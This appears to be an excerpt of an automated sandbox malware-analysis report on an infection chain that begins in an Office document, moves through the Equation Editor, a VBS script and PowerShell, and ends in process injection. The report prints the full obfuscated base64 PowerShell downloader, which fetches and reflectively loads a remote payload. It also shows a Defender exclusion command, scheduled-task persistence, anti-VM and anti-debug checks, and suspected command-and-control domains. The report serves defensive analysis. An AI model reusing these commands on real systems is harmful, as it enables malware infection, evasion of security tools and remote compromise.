      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731BECA
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731D51A
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731C1DA
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731BFBA
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731BFDA
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731BE2A
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731D26A
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731C18A
      Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7731C25A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 89904 second address: 8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 89B7E second address: 89B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: 250000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: 2280000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: 1F60000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: 80C0000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: 90C0000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: 92C0000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: A2C0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeMemory allocated: 460000 memory reserve | memory write watch
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeMemory allocated: 20C0000 memory reserve | memory write watch
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeMemory allocated: 1D00000 memory reserve | memory write watch
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A40101 rdtsc 22_2_00A40101
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 414Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1142Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 859Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6282Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 602Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4246Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 0.9 %
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3212Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2104Thread sleep count: 859 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep count: 6282 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2168Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2088Thread sleep time: -9223372036854770s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2088Thread sleep time: -3000000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2088Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1732Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 2728Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep count: 602 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep count: 4246 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2584Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1408Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -300000s >= -30000s
      Source: C:\Windows\System32\taskeng.exe TID: 3708Thread sleep time: -60000s >= -30000s
      Source: C:\Users\user\AppData\Roaming\niLILOT.exe TID: 3956Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\mstsc.exe TID: 3836Thread sleep time: -48000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_009120E2 PathFindFileNameW,PathAppendW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,FindNextFileW,PathAppendW,FindNextFileW,FindClose,27_2_009120E2
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeThread delayed: delay time: 922337203685477
      Source: explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
      Source: explorer.exe, 00000017.00000000.488448630.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000017.00000002.638410089.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000017.00000000.488448630.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
      Source: explorer.exe, 00000017.00000000.487849649.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
      Source: explorer.exe, 00000017.00000000.488448630.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A40101 rdtsc 22_2_00A40101
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009F00C4 NtCreateFile,LdrInitializeThunk,22_2_009F00C4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00913AE1 LoadLibraryW,GetProcAddress,FreeLibrary,27_2_00913AE1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009E0080 mov ecx, dword ptr fs:[00000030h]22_2_009E0080
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009E00EA mov eax, dword ptr fs:[00000030h]22_2_009E00EA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A026F8 mov eax, dword ptr fs:[00000030h]22_2_00A026F8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021F26F8 mov eax, dword ptr fs:[00000030h]27_2_021F26F8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00938791 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00938791
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeDomain query: www.my-tournament.live
      Source: C:\Windows\explorer.exeDomain query: www.senior-dating-73474.bond
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeNtClose: Indirect: 0x3CA56C
      Source: C:\Windows\SysWOW64\mstsc.exeNtClose: Indirect: 0x201A56C
      Source: C:\Windows\SysWOW64\mstsc.exeNtMapViewOfSection: Indirect: 0x2019D47
      Source: C:\Windows\SysWOW64\mstsc.exeNtQueueApcThread: Indirect: 0x201A531
      Source: C:\Windows\SysWOW64\mstsc.exeNtUnmapViewOfSection: Indirect: 0x2019DB9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeNtClose: Indirect: 0x36A56C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeNtQueueApcThread: Indirect: 0x3CA4F2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeNtQueueApcThread: Indirect: 0x36A4F2
      Source: C:\Windows\SysWOW64\mstsc.exeNtClose: Indirect: 0x2019DC5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread register set: target process: 1244
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread register set: target process: 1244
      Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 1244
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread APC queued: target process: C:\Windows\explorer.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 8D0000
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 4D0000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 4D2000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 7EFDE008Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"Jump to behavior
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\niLILOT.exe C:\Users\user\AppData\Roaming\niLILOT.exe
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'su5wt0tflwvycfjfu1njt04oicgnyycrj0yxdxjsid0gjysnzlgnkydoahr0chm6ly9yyscrj3cnkycuz2l0ahvijysndxnlcmnvbnrljysnbnquy28nkydtl05vjysnrgv0zscrj2mnkyd0t24vtm8nkydezxrly3rpbicrjy9yzwzzl2hlywrzl21haw4nkycvrgv0ywhojysnb3rolvyujysndhh0zicrj1gnkydojysnoybjricrjzenkydiyxmnkydljysnnjrdb250jysnzw50jysnid0nkycgjysnke5ldy0nkydpymply3qgjysnu3lzdccrj2unkydtlicrj04nkydldc5xzwjdjysnbgknkydlbicrj3qpjysnlkrvd25sb2fku3ryaw4nkydnkgngmxvybck7jysnigngjysnmwjpjysnbicrj2enkydyeumnkydvbnrlbnqgpsbbu3knkydzdgvtlkmnkydvbicrj3ynkydljysncnqnkyddjysnojpgcm8nkydtqmfzzty0u3ryjysnaw5nkgngmwjhc2u2nenvjysnbnrljysnbnqpoybjrjenkydhjysnc3nlbwjsesa9iftsjysnzwzszwn0ascrj29ulkfzcycrj2vtymx5jysnxtonkyc6tg9hzchjricrjzfiaw5hcnknkyddb250zw50ktsgjysnwycrj2rubglilklplkhvbwvdojpwqukoce5bdccrj3gnkyd0lljfukmnkyddui8zmzmvodiumtqujysnmdqyljgzly86chr0ahboqswgce4nkydbzgvzyscrj3rpdmfkb3boqswgce5bzgvzyxrpjysndmfkb3ankydoqswnkycgce5bzccrj2vzyxrpdmfkb3boqswgce5byscrj3nwbmv0x3inkydlz2jyb3dzzxjzce5blcbwtkfwjysntkenkycsce5bcccrj05bkscplnjlugxhq2uoj2zyaccsw1nucmlur11bq2hhcl0zoskucmvqbgfdzsgow0noyxjdotkrw0noyxjdnzarw0noyxjdndkplfttvhjpbkddw0noyxjdmzyplnjlugxhq2uokftdagfyxtexmitbq2hhcl03octbq2hhcl02nsksw1nucmlur11bq2hhcl0znckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
